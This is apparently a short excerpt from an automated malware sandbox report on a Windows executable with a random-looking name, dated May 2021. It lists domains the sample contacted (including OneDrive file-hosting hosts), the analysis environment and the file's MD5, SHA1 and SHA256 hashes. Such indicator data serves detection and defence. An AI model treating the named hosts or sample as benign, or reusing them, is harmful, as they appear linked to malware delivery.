www.georgeswebwerks.com	unknown	unknown
onedrive.live.com	unknown	unknown
xhtfga.dm.files.1drv.com	unknown	unknown

ID:	411769
Product:	CloudBasic
Start time:	06:29:05
Start date:	12.05.2021
Sample:	Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	4e71f90d1817f44313f4e101ef393968
SHA1:	3932f9822134761e7bf9bc1902f8cc28b6820559
SHA256:	aace20e28e61cb328da74ff938231b1ce9a07498d477efe3efc5c5d3d04b9dc1
Filetype:	Win32 Executable (generic) a (10002005/4) 99.24%